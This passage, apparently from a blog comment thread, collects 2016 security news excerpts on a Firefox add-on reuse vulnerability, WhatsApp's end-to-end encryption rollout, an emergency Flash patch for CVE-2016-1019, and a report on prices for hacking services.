The attack is made possible by a lack of isolation in Firefox among various add-ons installed by an end user. The underlying weakness has been described as an extension reuse vulnerability because it allows an attacker-developed add-on to conceal its malicious behavior by invoking the capabilities of other add-ons. Instead of directly causing a computer to visit a booby-trapped website or download malicious files, the add-on exploits vulnerabilities in popular third-party add-ons that allow the same nefarious actions to be carried out. Nine of the top 10 most popular Firefox add-ons contain exploitable vulnerabilities. By piggybacking off the capabilities of trusted third-party add-ons, the malicious add-on faces much better odds of not being detected.
The researchers noted that attackers must clear several hurdles for their malicious add-on to succeed. First, someone must go through the trouble of installing the trojanized extension. Second, the computer that downloads it must have enough vulnerable third-party add-ons installed to achieve the attackers’ objective. Still, the abundance of vulnerable add-ons makes the odds favor attackers, at least in many scenarios.
Tomi Engdahl says:
WhatsApp is now most widely used end-to-end crypto tool on the planet
WhatsApp now uses Signal protocol, which was largely funded by US taxpayers.
http://arstechnica.com/tech-policy/2016/04/whatsapp-is-now-most-widely-used-end-to-end-crypto-tool-on-the-planet/
WhatsApp has enabled end-to-end encryption across all versions of its messaging and voice calling software, according to a Tuesday announcement on the company’s website.
Given that WhatsApp is already in use by over 1 billion people worldwide, as users upgrade to the latest version, it will become the most widely used end-to-end crypto tool.
“We live in a world where more of our data is digitized than ever before,” Jan Koum, a WhatsApp co-founder, wrote in a company blog post on Tuesday. “Every day we see stories about sensitive records being improperly accessed or stolen. And if nothing is done, more of people’s digital information and communication will be vulnerable to attack in the years to come. Fortunately, end-to-end encryption protects us from these vulnerabilities.”
Tomi Engdahl says:
Adobe preps emergency Flash patch for bug hackers are exploiting
As if the world needed yet another reason to finally flush Flash forever
http://www.theregister.co.uk/2016/04/06/adobe_prepping_outofband_flash_patch/
Adobe will this week issue an out-of-band patch for Flash after spotting a critical flaw that is now being “actively exploited” in the wild.
The flaw, CVE-2016-1019, affects Flash Player version 20.0.0.306 and older for Windows, OS X, Linux, and Chrome OS. Adobe made the jump to patch after learning that users of Windows 7 and Windows XP are being actively targeted by malware writers exploiting the flaw. It hopes to have the fix out by April 7 or as soon as possible afterwards.
Tomi Engdahl says:
Hacked-corporate-email-as-a-service costs just US$500 a seat!
Email’s cheap, but cracked Australian credit cards remain the world’s most expensive
http://www.theregister.co.uk/2016/04/06/crims_will_quietly_hack_any_corporate_email_account_for_500/
Want to read a business rival’s email? Dell wonks say hacked-corporate-email-as-a-service operators can deliver for just US$500.
That low, low, price is offered by one accomplished hacker on a popular cyber crime forum and detailed in a Secure Works report on the cost of hacking services.
The hacker charges less for raiding personal email and social media accounts with popped Gmail, Facebook, Hotmail, and Yahoo! accounts costing US$129.
Buyers are told how the hacker has pulled off the exploitation which they boast does not involve changing passwords and will not be detected by victims.
https://www.secureworks.com/~/media/Files/US/Reports/SecureWorksSECO2123NUndergroundHackerMarketplace.ashx